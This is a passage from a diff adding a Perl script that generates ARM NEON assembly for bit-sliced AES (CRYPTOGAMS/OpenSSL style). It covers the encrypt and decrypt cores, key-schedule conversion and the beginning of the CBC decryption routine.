+	 veor	@x[4], @x[4], @t[6]
+	 veor	@x[5], @x[5], @t[3]
+	 veor	@x[3], @x[3], @t[6]
+	 veor	@x[6], @x[6], @t[4]
+	 veor	@x[4], @x[4], @t[7]
+	 veor	@x[5], @x[5], @t[7]
+	 veor	@x[7], @x[7], @t[5]
+___
+	&MixColumns	(@x,@t,1);	# flipped 2<->3 and 4<->6
+}
+
+sub swapmove {
+my ($a,$b,$n,$mask,$t)=@_;
+$code.=<<___;
+	vshr.u64	$t, $b, #$n
+	veor		$t, $t, $a
+	vand		$t, $t, $mask
+	veor		$a, $a, $t
+	vshl.u64	$t, $t, #$n
+	veor		$b, $b, $t
+___
+}
+sub swapmove2x {
+my ($a0,$b0,$a1,$b1,$n,$mask,$t0,$t1)=@_;
+$code.=<<___;
+	vshr.u64	$t0, $b0, #$n
+	 vshr.u64	$t1, $b1, #$n
+	veor		$t0, $t0, $a0
+	 veor		$t1, $t1, $a1
+	vand		$t0, $t0, $mask
+	 vand		$t1, $t1, $mask
+	veor		$a0, $a0, $t0
+	vshl.u64	$t0, $t0, #$n
+	 veor		$a1, $a1, $t1
+	 vshl.u64	$t1, $t1, #$n
+	veor		$b0, $b0, $t0
+	 veor		$b1, $b1, $t1
+___
+}
+
+sub bitslice {
+my @x=reverse(@_[0..7]);
+my ($t0,$t1,$t2,$t3)=@_[8..11];
+$code.=<<___;
+	vmov.i8	$t0,#0x55			@ compose .LBS0
+	vmov.i8	$t1,#0x33			@ compose .LBS1
+___
+	&swapmove2x(@x[0,1,2,3],1,$t0,$t2,$t3);
+	&swapmove2x(@x[4,5,6,7],1,$t0,$t2,$t3);
+$code.=<<___;
+	vmov.i8	$t0,#0x0f			@ compose .LBS2
+___
+	&swapmove2x(@x[0,2,1,3],2,$t1,$t2,$t3);
+	&swapmove2x(@x[4,6,5,7],2,$t1,$t2,$t3);
+
+	&swapmove2x(@x[0,4,1,5],4,$t0,$t2,$t3);
+	&swapmove2x(@x[2,6,3,7],4,$t0,$t2,$t3);
+}
+
+$code.=<<___;
+#ifndef __KERNEL__
+# include "arm_arch.h"
+
+# define VFP_ABI_PUSH	vstmdb	sp!,{d8-d15}
+# define VFP_ABI_POP	vldmia	sp!,{d8-d15}
+# define VFP_ABI_FRAME	0x40
+#else
+# define VFP_ABI_PUSH
+# define VFP_ABI_POP
+# define VFP_ABI_FRAME	0
+# define BSAES_ASM_EXTENDED_KEY
+# define XTS_CHAIN_TWEAK
+# define __ARM_ARCH__ __LINUX_ARM_ARCH__
+# define __ARM_MAX_ARCH__ __LINUX_ARM_ARCH__
+#endif
+
+#ifdef __thumb__
+# define adrl adr
+#endif
+
+#if __ARM_MAX_ARCH__>=7
+.arch	armv7-a
+.fpu	neon
+
+.text
+.syntax	unified 	@ ARMv7-capable assembler is expected to handle this
+#ifdef __thumb2__
+.thumb
+#else
+.code   32
+#endif
+
+.type	_bsaes_decrypt8,%function
+.align	4
+_bsaes_decrypt8:
+	adr	$const,_bsaes_decrypt8
+	vldmia	$key!, {@XMM[9]}		@ round 0 key
+	add	$const,$const,#.LM0ISR-_bsaes_decrypt8
+
+	vldmia	$const!, {@XMM[8]}		@ .LM0ISR
+	veor	@XMM[10], @XMM[0], @XMM[9]	@ xor with round0 key
+	veor	@XMM[11], @XMM[1], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[0])`, {@XMM[10]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[0])`, {@XMM[10]}, `&Dhi(@XMM[8])`
+	veor	@XMM[12], @XMM[2], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[1])`, {@XMM[11]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[1])`, {@XMM[11]}, `&Dhi(@XMM[8])`
+	veor	@XMM[13], @XMM[3], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[2])`, {@XMM[12]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[2])`, {@XMM[12]}, `&Dhi(@XMM[8])`
+	veor	@XMM[14], @XMM[4], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[3])`, {@XMM[13]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[3])`, {@XMM[13]}, `&Dhi(@XMM[8])`
+	veor	@XMM[15], @XMM[5], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[4])`, {@XMM[14]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[4])`, {@XMM[14]}, `&Dhi(@XMM[8])`
+	veor	@XMM[10], @XMM[6], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[5])`, {@XMM[15]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[5])`, {@XMM[15]}, `&Dhi(@XMM[8])`
+	veor	@XMM[11], @XMM[7], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[6])`, {@XMM[10]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[6])`, {@XMM[10]}, `&Dhi(@XMM[8])`
+	 vtbl.8	`&Dlo(@XMM[7])`, {@XMM[11]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[7])`, {@XMM[11]}, `&Dhi(@XMM[8])`
+___
+	&bitslice	(@XMM[0..7, 8..11]);
+$code.=<<___;
+	sub	$rounds,$rounds,#1
+	b	.Ldec_sbox
+.align	4
+.Ldec_loop:
+___
+	&ShiftRows	(@XMM[0..7, 8..12]);
+$code.=".Ldec_sbox:\n";
+	&InvSbox	(@XMM[0..7, 8..15]);
+$code.=<<___;
+	subs	$rounds,$rounds,#1
+	bcc	.Ldec_done
+___
+	&InvMixColumns	(@XMM[0,1,6,4,2,7,3,5, 8..15]);
+$code.=<<___;
+	vldmia	$const, {@XMM[12]}		@ .LISR
+	ite	eq				@ Thumb2 thing, sanity check in ARM
+	addeq	$const,$const,#0x10
+	bne	.Ldec_loop
+	vldmia	$const, {@XMM[12]}		@ .LISRM0
+	b	.Ldec_loop
+.align	4
+.Ldec_done:
+___
+	&bitslice	(@XMM[0,1,6,4,2,7,3,5, 8..11]);
+$code.=<<___;
+	vldmia	$key, {@XMM[8]}			@ last round key
+	veor	@XMM[6], @XMM[6], @XMM[8]
+	veor	@XMM[4], @XMM[4], @XMM[8]
+	veor	@XMM[2], @XMM[2], @XMM[8]
+	veor	@XMM[7], @XMM[7], @XMM[8]
+	veor	@XMM[3], @XMM[3], @XMM[8]
+	veor	@XMM[5], @XMM[5], @XMM[8]
+	veor	@XMM[0], @XMM[0], @XMM[8]
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	bx	lr
+.size	_bsaes_decrypt8,.-_bsaes_decrypt8
+
+.type	_bsaes_const,%object
+.align	6
+_bsaes_const:
+.LM0ISR:	@ InvShiftRows constants
+	.quad	0x0a0e0206070b0f03, 0x0004080c0d010509
+.LISR:
+	.quad	0x0504070602010003, 0x0f0e0d0c080b0a09
+.LISRM0:
+	.quad	0x01040b0e0205080f, 0x0306090c00070a0d
+.LM0SR:		@ ShiftRows constants
+	.quad	0x0a0e02060f03070b, 0x0004080c05090d01
+.LSR:
+	.quad	0x0504070600030201, 0x0f0e0d0c0a09080b
+.LSRM0:
+	.quad	0x0304090e00050a0f, 0x01060b0c0207080d
+.LM0:
+	.quad	0x02060a0e03070b0f, 0x0004080c0105090d
+.LREVM0SR:
+	.quad	0x090d01050c000408, 0x03070b0f060a0e02
+.asciz	"Bit-sliced AES for NEON, CRYPTOGAMS by <appro\@openssl.org>"
+.align	6
+.size	_bsaes_const,.-_bsaes_const
+
+.type	_bsaes_encrypt8,%function
+.align	4
+_bsaes_encrypt8:
+	adr	$const,_bsaes_encrypt8
+	vldmia	$key!, {@XMM[9]}		@ round 0 key
+	sub	$const,$const,#_bsaes_encrypt8-.LM0SR
+
+	vldmia	$const!, {@XMM[8]}		@ .LM0SR
+_bsaes_encrypt8_alt:
+	veor	@XMM[10], @XMM[0], @XMM[9]	@ xor with round0 key
+	veor	@XMM[11], @XMM[1], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[0])`, {@XMM[10]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[0])`, {@XMM[10]}, `&Dhi(@XMM[8])`
+	veor	@XMM[12], @XMM[2], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[1])`, {@XMM[11]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[1])`, {@XMM[11]}, `&Dhi(@XMM[8])`
+	veor	@XMM[13], @XMM[3], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[2])`, {@XMM[12]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[2])`, {@XMM[12]}, `&Dhi(@XMM[8])`
+	veor	@XMM[14], @XMM[4], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[3])`, {@XMM[13]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[3])`, {@XMM[13]}, `&Dhi(@XMM[8])`
+	veor	@XMM[15], @XMM[5], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[4])`, {@XMM[14]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[4])`, {@XMM[14]}, `&Dhi(@XMM[8])`
+	veor	@XMM[10], @XMM[6], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[5])`, {@XMM[15]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[5])`, {@XMM[15]}, `&Dhi(@XMM[8])`
+	veor	@XMM[11], @XMM[7], @XMM[9]
+	 vtbl.8	`&Dlo(@XMM[6])`, {@XMM[10]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[6])`, {@XMM[10]}, `&Dhi(@XMM[8])`
+	 vtbl.8	`&Dlo(@XMM[7])`, {@XMM[11]}, `&Dlo(@XMM[8])`
+	 vtbl.8	`&Dhi(@XMM[7])`, {@XMM[11]}, `&Dhi(@XMM[8])`
+_bsaes_encrypt8_bitslice:
+___
+	&bitslice	(@XMM[0..7, 8..11]);
+$code.=<<___;
+	sub	$rounds,$rounds,#1
+	b	.Lenc_sbox
+.align	4
+.Lenc_loop:
+___
+	&ShiftRows	(@XMM[0..7, 8..12]);
+$code.=".Lenc_sbox:\n";
+	&Sbox		(@XMM[0..7, 8..15]);
+$code.=<<___;
+	subs	$rounds,$rounds,#1
+	bcc	.Lenc_done
+___
+	&MixColumns	(@XMM[0,1,4,6,3,7,2,5, 8..15]);
+$code.=<<___;
+	vldmia	$const, {@XMM[12]}		@ .LSR
+	ite	eq				@ Thumb2 thing, samity check in ARM
+	addeq	$const,$const,#0x10
+	bne	.Lenc_loop
+	vldmia	$const, {@XMM[12]}		@ .LSRM0
+	b	.Lenc_loop
+.align	4
+.Lenc_done:
+___
+	# output in lsb > [t0, t1, t4, t6, t3, t7, t2, t5] < msb
+	&bitslice	(@XMM[0,1,4,6,3,7,2,5, 8..11]);
+$code.=<<___;
+	vldmia	$key, {@XMM[8]}			@ last round key
+	veor	@XMM[4], @XMM[4], @XMM[8]
+	veor	@XMM[6], @XMM[6], @XMM[8]
+	veor	@XMM[3], @XMM[3], @XMM[8]
+	veor	@XMM[7], @XMM[7], @XMM[8]
+	veor	@XMM[2], @XMM[2], @XMM[8]
+	veor	@XMM[5], @XMM[5], @XMM[8]
+	veor	@XMM[0], @XMM[0], @XMM[8]
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	bx	lr
+.size	_bsaes_encrypt8,.-_bsaes_encrypt8
+___
+}
+{
+my ($out,$inp,$rounds,$const)=("r12","r4","r5","r6");
+
+sub bitslice_key {
+my @x=reverse(@_[0..7]);
+my ($bs0,$bs1,$bs2,$t2,$t3)=@_[8..12];
+
+	&swapmove	(@x[0,1],1,$bs0,$t2,$t3);
+$code.=<<___;
+	@ &swapmove(@x[2,3],1,$t0,$t2,$t3);
+	vmov	@x[2], @x[0]
+	vmov	@x[3], @x[1]
+___
+	#&swapmove2x(@x[4,5,6,7],1,$t0,$t2,$t3);
+
+	&swapmove2x	(@x[0,2,1,3],2,$bs1,$t2,$t3);
+$code.=<<___;
+	@ &swapmove2x(@x[4,6,5,7],2,$t1,$t2,$t3);
+	vmov	@x[4], @x[0]
+	vmov	@x[6], @x[2]
+	vmov	@x[5], @x[1]
+	vmov	@x[7], @x[3]
+___
+	&swapmove2x	(@x[0,4,1,5],4,$bs2,$t2,$t3);
+	&swapmove2x	(@x[2,6,3,7],4,$bs2,$t2,$t3);
+}
+
+$code.=<<___;
+.type	_bsaes_key_convert,%function
+.align	4
+_bsaes_key_convert:
+	adr	$const,_bsaes_key_convert
+	vld1.8	{@XMM[7]},  [$inp]!		@ load round 0 key
+	sub	$const,$const,#_bsaes_key_convert-.LM0
+	vld1.8	{@XMM[15]}, [$inp]!		@ load round 1 key
+
+	vmov.i8	@XMM[8],  #0x01			@ bit masks
+	vmov.i8	@XMM[9],  #0x02
+	vmov.i8	@XMM[10], #0x04
+	vmov.i8	@XMM[11], #0x08
+	vmov.i8	@XMM[12], #0x10
+	vmov.i8	@XMM[13], #0x20
+	vldmia	$const, {@XMM[14]}		@ .LM0
+
+#ifdef __ARMEL__
+	vrev32.8	@XMM[7],  @XMM[7]
+	vrev32.8	@XMM[15], @XMM[15]
+#endif
+	sub	$rounds,$rounds,#1
+	vstmia	$out!, {@XMM[7]}		@ save round 0 key
+	b	.Lkey_loop
+
+.align	4
+.Lkey_loop:
+	vtbl.8	`&Dlo(@XMM[7])`,{@XMM[15]},`&Dlo(@XMM[14])`
+	vtbl.8	`&Dhi(@XMM[7])`,{@XMM[15]},`&Dhi(@XMM[14])`
+	vmov.i8	@XMM[6],  #0x40
+	vmov.i8	@XMM[15], #0x80
+
+	vtst.8	@XMM[0], @XMM[7], @XMM[8]
+	vtst.8	@XMM[1], @XMM[7], @XMM[9]
+	vtst.8	@XMM[2], @XMM[7], @XMM[10]
+	vtst.8	@XMM[3], @XMM[7], @XMM[11]
+	vtst.8	@XMM[4], @XMM[7], @XMM[12]
+	vtst.8	@XMM[5], @XMM[7], @XMM[13]
+	vtst.8	@XMM[6], @XMM[7], @XMM[6]
+	vtst.8	@XMM[7], @XMM[7], @XMM[15]
+	vld1.8	{@XMM[15]}, [$inp]!		@ load next round key
+	vmvn	@XMM[0], @XMM[0]		@ "pnot"
+	vmvn	@XMM[1], @XMM[1]
+	vmvn	@XMM[5], @XMM[5]
+	vmvn	@XMM[6], @XMM[6]
+#ifdef __ARMEL__
+	vrev32.8	@XMM[15], @XMM[15]
+#endif
+	subs	$rounds,$rounds,#1
+	vstmia	$out!,{@XMM[0]-@XMM[7]}		@ write bit-sliced round key
+	bne	.Lkey_loop
+
+	vmov.i8	@XMM[7],#0x63			@ compose .L63
+	@ don't save last round key
+	bx	lr
+.size	_bsaes_key_convert,.-_bsaes_key_convert
+___
+}
+
+if (0) {		# following four functions are unsupported interface
+			# used for benchmarking...
+$code.=<<___;
+.globl	bsaes_enc_key_convert
+.type	bsaes_enc_key_convert,%function
+.align	4
+bsaes_enc_key_convert:
+	stmdb	sp!,{r4-r6,lr}
+	vstmdb	sp!,{d8-d15}		@ ABI specification says so
+
+	ldr	r5,[$inp,#240]			@ pass rounds
+	mov	r4,$inp				@ pass key
+	mov	r12,$out			@ pass key schedule
+	bl	_bsaes_key_convert
+	veor	@XMM[7],@XMM[7],@XMM[15]	@ fix up last round key
+	vstmia	r12, {@XMM[7]}			@ save last round key
+
+	vldmia	sp!,{d8-d15}
+	ldmia	sp!,{r4-r6,pc}
+.size	bsaes_enc_key_convert,.-bsaes_enc_key_convert
+
+.globl	bsaes_encrypt_128
+.type	bsaes_encrypt_128,%function
+.align	4
+bsaes_encrypt_128:
+	stmdb	sp!,{r4-r6,lr}
+	vstmdb	sp!,{d8-d15}		@ ABI specification says so
+.Lenc128_loop:
+	vld1.8	{@XMM[0]-@XMM[1]}, [$inp]!	@ load input
+	vld1.8	{@XMM[2]-@XMM[3]}, [$inp]!
+	mov	r4,$key				@ pass the key
+	vld1.8	{@XMM[4]-@XMM[5]}, [$inp]!
+	mov	r5,#10				@ pass rounds
+	vld1.8	{@XMM[6]-@XMM[7]}, [$inp]!
+
+	bl	_bsaes_encrypt8
+
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	vst1.8	{@XMM[4]}, [$out]!
+	vst1.8	{@XMM[6]}, [$out]!
+	vst1.8	{@XMM[3]}, [$out]!
+	vst1.8	{@XMM[7]}, [$out]!
+	vst1.8	{@XMM[2]}, [$out]!
+	subs	$len,$len,#0x80
+	vst1.8	{@XMM[5]}, [$out]!
+	bhi	.Lenc128_loop
+
+	vldmia	sp!,{d8-d15}
+	ldmia	sp!,{r4-r6,pc}
+.size	bsaes_encrypt_128,.-bsaes_encrypt_128
+
+.globl	bsaes_dec_key_convert
+.type	bsaes_dec_key_convert,%function
+.align	4
+bsaes_dec_key_convert:
+	stmdb	sp!,{r4-r6,lr}
+	vstmdb	sp!,{d8-d15}		@ ABI specification says so
+
+	ldr	r5,[$inp,#240]			@ pass rounds
+	mov	r4,$inp				@ pass key
+	mov	r12,$out			@ pass key schedule
+	bl	_bsaes_key_convert
+	vldmia	$out, {@XMM[6]}
+	vstmia	r12,  {@XMM[15]}		@ save last round key
+	veor	@XMM[7], @XMM[7], @XMM[6]	@ fix up round 0 key
+	vstmia	$out, {@XMM[7]}
+
+	vldmia	sp!,{d8-d15}
+	ldmia	sp!,{r4-r6,pc}
+.size	bsaes_dec_key_convert,.-bsaes_dec_key_convert
+
+.globl	bsaes_decrypt_128
+.type	bsaes_decrypt_128,%function
+.align	4
+bsaes_decrypt_128:
+	stmdb	sp!,{r4-r6,lr}
+	vstmdb	sp!,{d8-d15}		@ ABI specification says so
+.Ldec128_loop:
+	vld1.8	{@XMM[0]-@XMM[1]}, [$inp]!	@ load input
+	vld1.8	{@XMM[2]-@XMM[3]}, [$inp]!
+	mov	r4,$key				@ pass the key
+	vld1.8	{@XMM[4]-@XMM[5]}, [$inp]!
+	mov	r5,#10				@ pass rounds
+	vld1.8	{@XMM[6]-@XMM[7]}, [$inp]!
+
+	bl	_bsaes_decrypt8
+
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	vst1.8	{@XMM[6]}, [$out]!
+	vst1.8	{@XMM[4]}, [$out]!
+	vst1.8	{@XMM[2]}, [$out]!
+	vst1.8	{@XMM[7]}, [$out]!
+	vst1.8	{@XMM[3]}, [$out]!
+	subs	$len,$len,#0x80
+	vst1.8	{@XMM[5]}, [$out]!
+	bhi	.Ldec128_loop
+
+	vldmia	sp!,{d8-d15}
+	ldmia	sp!,{r4-r6,pc}
+.size	bsaes_decrypt_128,.-bsaes_decrypt_128
+___
+}
+{
+my ($inp,$out,$len,$key, $ivp,$fp,$rounds)=map("r$_",(0..3,8..10));
+my ($keysched)=("sp");
+
+$code.=<<___;
+.extern AES_cbc_encrypt
+.extern AES_decrypt
+
+.global	bsaes_cbc_encrypt
+.type	bsaes_cbc_encrypt,%function
+.align	5
+bsaes_cbc_encrypt:
+#ifndef	__KERNEL__
+	cmp	$len, #128
+#ifndef	__thumb__
+	blo	AES_cbc_encrypt
+#else
+	bhs	1f
+	b	AES_cbc_encrypt
+1:
+#endif
+#endif
+
+	@ it is up to the caller to make sure we are called with enc == 0
+
+	mov	ip, sp
+	stmdb	sp!, {r4-r10, lr}
+	VFP_ABI_PUSH
+	ldr	$ivp, [ip]			@ IV is 1st arg on the stack
+	mov	$len, $len, lsr#4		@ len in 16 byte blocks
+	sub	sp, #0x10			@ scratch space to carry over the IV
+	mov	$fp, sp				@ save sp
+
+	ldr	$rounds, [$key, #240]		@ get # of rounds
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	@ allocate the key schedule on the stack
+	sub	r12, sp, $rounds, lsl#7		@ 128 bytes per inner round key
+	add	r12, #`128-32`			@ sifze of bit-slices key schedule
+
+	@ populate the key schedule
+	mov	r4, $key			@ pass key
+	mov	r5, $rounds			@ pass # of rounds
+	mov	sp, r12				@ sp is $keysched
+	bl	_bsaes_key_convert
+	vldmia	$keysched, {@XMM[6]}
+	vstmia	r12,  {@XMM[15]}		@ save last round key
+	veor	@XMM[7], @XMM[7], @XMM[6]	@ fix up round 0 key
+	vstmia	$keysched, {@XMM[7]}
+#else
+	ldr	r12, [$key, #244]
+	eors	r12, #1
+	beq	0f
+
+	@ populate the key schedule
+	str	r12, [$key, #244]
+	mov	r4, $key			@ pass key
+	mov	r5, $rounds			@ pass # of rounds
+	add	r12, $key, #248			@ pass key schedule
+	bl	_bsaes_key_convert
+	add	r4, $key, #248
+	vldmia	r4, {@XMM[6]}
+	vstmia	r12, {@XMM[15]}			@ save last round key
+	veor	@XMM[7], @XMM[7], @XMM[6]	@ fix up round 0 key
+	vstmia	r4, {@XMM[7]}
+
+.align	2
+0:
+#endif
+
+	vld1.8	{@XMM[15]}, [$ivp]		@ load IV
+	b	.Lcbc_dec_loop
+
+.align	4
+.Lcbc_dec_loop:
+	subs	$len, $len, #0x8
+	bmi	.Lcbc_dec_loop_finish
+
+	vld1.8	{@XMM[0]-@XMM[1]}, [$inp]!	@ load input
+	vld1.8	{@XMM[2]-@XMM[3]}, [$inp]!
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	mov	r4, $keysched			@ pass the key
+#else
+	add	r4, $key, #248
+#endif
+	vld1.8	{@XMM[4]-@XMM[5]}, [$inp]!
+	mov	r5, $rounds
+	vld1.8	{@XMM[6]-@XMM[7]}, [$inp]
+	sub	$inp, $inp, #0x60
+	vstmia	$fp, {@XMM[15]}			@ put aside IV
+
+	bl	_bsaes_decrypt8
+
+	vldmia	$fp, {@XMM[14]}			@ reload IV
+	vld1.8	{@XMM[8]-@XMM[9]}, [$inp]!	@ reload input
+	veor	@XMM[0], @XMM[0], @XMM[14]	@ ^= IV
+	vld1.8	{@XMM[10]-@XMM[11]}, [$inp]!
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	veor	@XMM[6], @XMM[6], @XMM[9]
+	vld1.8	{@XMM[12]-@XMM[13]}, [$inp]!
+	veor	@XMM[4], @XMM[4], @XMM[10]
+	veor	@XMM[2], @XMM[2], @XMM[11]
+	vld1.8	{@XMM[14]-@XMM[15]}, [$inp]!
+	veor	@XMM[7], @XMM[7], @XMM[12]
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	veor	@XMM[3], @XMM[3], @XMM[13]
+	vst1.8	{@XMM[6]}, [$out]!
+	veor	@XMM[5], @XMM[5], @XMM[14]
+	vst1.8	{@XMM[4]}, [$out]!
+	vst1.8	{@XMM[2]}, [$out]!
+	vst1.8	{@XMM[7]}, [$out]!
+	vst1.8	{@XMM[3]}, [$out]!
+	vst1.8	{@XMM[5]}, [$out]!
+
+	b	.Lcbc_dec_loop
+
+.Lcbc_dec_loop_finish:
+	adds	$len, $len, #8
+	beq	.Lcbc_dec_done
+
+	vld1.8	{@XMM[0]}, [$inp]!		@ load input
+	cmp	$len, #2
+	blo	.Lcbc_dec_one
+	vld1.8	{@XMM[1]}, [$inp]!
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	mov	r4, $keysched			@ pass the key
+#else
+	add	r4, $key, #248
+#endif
+	mov	r5, $rounds
+	vstmia	$fp, {@XMM[15]}			@ put aside IV
+	beq	.Lcbc_dec_two
+	vld1.8	{@XMM[2]}, [$inp]!
+	cmp	$len, #4
+	blo	.Lcbc_dec_three
+	vld1.8	{@XMM[3]}, [$inp]!
+	beq	.Lcbc_dec_four
+	vld1.8	{@XMM[4]}, [$inp]!
+	cmp	$len, #6
+	blo	.Lcbc_dec_five
+	vld1.8	{@XMM[5]}, [$inp]!
+	beq	.Lcbc_dec_six
+	vld1.8	{@XMM[6]}, [$inp]!
+	sub	$inp, $inp, #0x70
+
+	bl	_bsaes_decrypt8
+
+	vldmia	$fp, {@XMM[14]}			@ reload IV
+	vld1.8	{@XMM[8]-@XMM[9]}, [$inp]!	@ reload input
+	veor	@XMM[0], @XMM[0], @XMM[14]	@ ^= IV
+	vld1.8	{@XMM[10]-@XMM[11]}, [$inp]!
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	veor	@XMM[6], @XMM[6], @XMM[9]
+	vld1.8	{@XMM[12]-@XMM[13]}, [$inp]!
+	veor	@XMM[4], @XMM[4], @XMM[10]
+	veor	@XMM[2], @XMM[2], @XMM[11]
+	vld1.8	{@XMM[15]}, [$inp]!
+	veor	@XMM[7], @XMM[7], @XMM[12]
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	veor	@XMM[3], @XMM[3], @XMM[13]
+	vst1.8	{@XMM[6]}, [$out]!
+	vst1.8	{@XMM[4]}, [$out]!
+	vst1.8	{@XMM[2]}, [$out]!
+	vst1.8	{@XMM[7]}, [$out]!
+	vst1.8	{@XMM[3]}, [$out]!
+	b	.Lcbc_dec_done
+.align	4
+.Lcbc_dec_six:
+	sub	$inp, $inp, #0x60
+	bl	_bsaes_decrypt8
+	vldmia	$fp,{@XMM[14]}			@ reload IV
+	vld1.8	{@XMM[8]-@XMM[9]}, [$inp]!	@ reload input
+	veor	@XMM[0], @XMM[0], @XMM[14]	@ ^= IV
+	vld1.8	{@XMM[10]-@XMM[11]}, [$inp]!
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	veor	@XMM[6], @XMM[6], @XMM[9]
+	vld1.8	{@XMM[12]}, [$inp]!
+	veor	@XMM[4], @XMM[4], @XMM[10]
+	veor	@XMM[2], @XMM[2], @XMM[11]
+	vld1.8	{@XMM[15]}, [$inp]!
+	veor	@XMM[7], @XMM[7], @XMM[12]
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	vst1.8	{@XMM[6]}, [$out]!
+	vst1.8	{@XMM[4]}, [$out]!
+	vst1.8	{@XMM[2]}, [$out]!
+	vst1.8	{@XMM[7]}, [$out]!
+	b	.Lcbc_dec_done
+.align	4
+.Lcbc_dec_five:
+	sub	$inp, $inp, #0x50
+	bl	_bsaes_decrypt8
+	vldmia	$fp, {@XMM[14]}			@ reload IV
+	vld1.8	{@XMM[8]-@XMM[9]}, [$inp]!	@ reload input
+	veor	@XMM[0], @XMM[0], @XMM[14]	@ ^= IV
+	vld1.8	{@XMM[10]-@XMM[11]}, [$inp]!
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	veor	@XMM[6], @XMM[6], @XMM[9]
+	vld1.8	{@XMM[15]}, [$inp]!
+	veor	@XMM[4], @XMM[4], @XMM[10]
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	veor	@XMM[2], @XMM[2], @XMM[11]
+	vst1.8	{@XMM[6]}, [$out]!
+	vst1.8	{@XMM[4]}, [$out]!
+	vst1.8	{@XMM[2]}, [$out]!
+	b	.Lcbc_dec_done
+.align	4
+.Lcbc_dec_four:
+	sub	$inp, $inp, #0x40
+	bl	_bsaes_decrypt8
+	vldmia	$fp, {@XMM[14]}			@ reload IV
+	vld1.8	{@XMM[8]-@XMM[9]}, [$inp]!	@ reload input
+	veor	@XMM[0], @XMM[0], @XMM[14]	@ ^= IV
+	vld1.8	{@XMM[10]}, [$inp]!
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	veor	@XMM[6], @XMM[6], @XMM[9]
+	vld1.8	{@XMM[15]}, [$inp]!
+	veor	@XMM[4], @XMM[4], @XMM[10]
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	vst1.8	{@XMM[6]}, [$out]!
+	vst1.8	{@XMM[4]}, [$out]!
+	b	.Lcbc_dec_done
+.align	4
+.Lcbc_dec_three:
+	sub	$inp, $inp, #0x30
+	bl	_bsaes_decrypt8
+	vldmia	$fp, {@XMM[14]}			@ reload IV
+	vld1.8	{@XMM[8]-@XMM[9]}, [$inp]!	@ reload input
+	veor	@XMM[0], @XMM[0], @XMM[14]	@ ^= IV
+	vld1.8	{@XMM[15]}, [$inp]!
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	veor	@XMM[6], @XMM[6], @XMM[9]
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	vst1.8	{@XMM[6]}, [$out]!
+	b	.Lcbc_dec_done
+.align	4
+.Lcbc_dec_two:
+	sub	$inp, $inp, #0x20
+	bl	_bsaes_decrypt8
+	vldmia	$fp, {@XMM[14]}			@ reload IV
+	vld1.8	{@XMM[8]}, [$inp]!		@ reload input
+	veor	@XMM[0], @XMM[0], @XMM[14]	@ ^= IV
+	vld1.8	{@XMM[15]}, [$inp]!		@ reload input
+	veor	@XMM[1], @XMM[1], @XMM[8]
+	vst1.8	{@XMM[0]-@XMM[1]}, [$out]!	@ write output
+	b	.Lcbc_dec_done
+.align	4
+.Lcbc_dec_one:
+	sub	$inp, $inp, #0x10
+	mov	$rounds, $out			@ save original out pointer
+	mov	$out, $fp			@ use the iv scratch space as out buffer
+	mov	r2, $key
+	vmov	@XMM[4],@XMM[15]		@ just in case ensure that IV
+	vmov	@XMM[5],@XMM[0]			@ and input are preserved
+	bl	AES_decrypt
+	vld1.8	{@XMM[0]}, [$fp,:64]		@ load result
+	veor	@XMM[0], @XMM[0], @XMM[4]	@ ^= IV
+	vmov	@XMM[15], @XMM[5]		@ @XMM[5] holds input
+	vst1.8	{@XMM[0]}, [$rounds]		@ write output
+
+.Lcbc_dec_done:
+#ifndef	BSAES_ASM_EXTENDED_KEY
+	vmov.i32	q0, #0
+	vmov.i32	q1, #0
+.Lcbc_dec_bzero:				@ wipe key schedule [if any]
+	vstmia		$keysched!, {q0-q1}
+	cmp		$keysched, $fp
